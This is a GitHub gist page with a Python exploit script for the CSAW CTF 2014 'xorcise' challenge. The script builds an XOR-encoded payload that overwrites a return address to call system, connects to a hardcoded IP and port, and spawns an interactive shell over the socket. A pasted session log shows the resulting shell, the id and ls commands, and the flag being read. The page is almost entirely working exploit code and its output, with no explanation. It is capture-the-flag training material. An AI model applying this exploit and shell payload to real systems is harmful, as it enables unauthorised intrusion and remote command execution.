Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
CSAW CTF 2014 - xorcise exploit
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
#CSAW 2014 CTF
#xorcise exploit
def xor(data, key):
o = ''
for i in range(len(data)):
o += chr(ord(data[i]) ^ ord(key[i%len(key)]) ^ 0x8F)
return o
key = "\x8F" + "\x8A" + "\x8F" * 3 + "\x9C" + "\x7B" + "\x99" #overwrite ret decipher x plt@system
cmd = "/bin/sh -i <&4 >&4 2>&4"
cmd += "\x00" * (128 - len(cmd))
s = NullSocket("128.238.66.227", 24001)
s.write(chr(135) + key + xor(cmd, key))
s.interactive()
'''
sh: cannot set terminal process group (134): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.3$ id
id
uid=1000(xor) gid=1000(xor) groups=1000(xor)
sh-4.3$ ls -la
ls -la
total 44
drwxr-xr-x 2 root root 4096 Sep 20 00:18 .
drwxr-xr-x 3 root root 4096 Sep 14 14:14 ..
-rw-r--r-- 1 root root 30 Sep 20 00:18 flag.txt
-rw-r--r-- 1 root root 7 Sep 12 19:13 password.txt
-rwxr-xr-x 1 root root 12308 Sep 12 19:08 xorcise
-rw-r--r-- 1 root root 10248 Sep 10 13:16 xorcise.c
sh-4.3$ cat flag.txt
ceat flag.txt
flag{code_exec>=crypto_break}
sh-4.3$ exit
exit
exit
*** Connection closed by remote host ***
'''
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.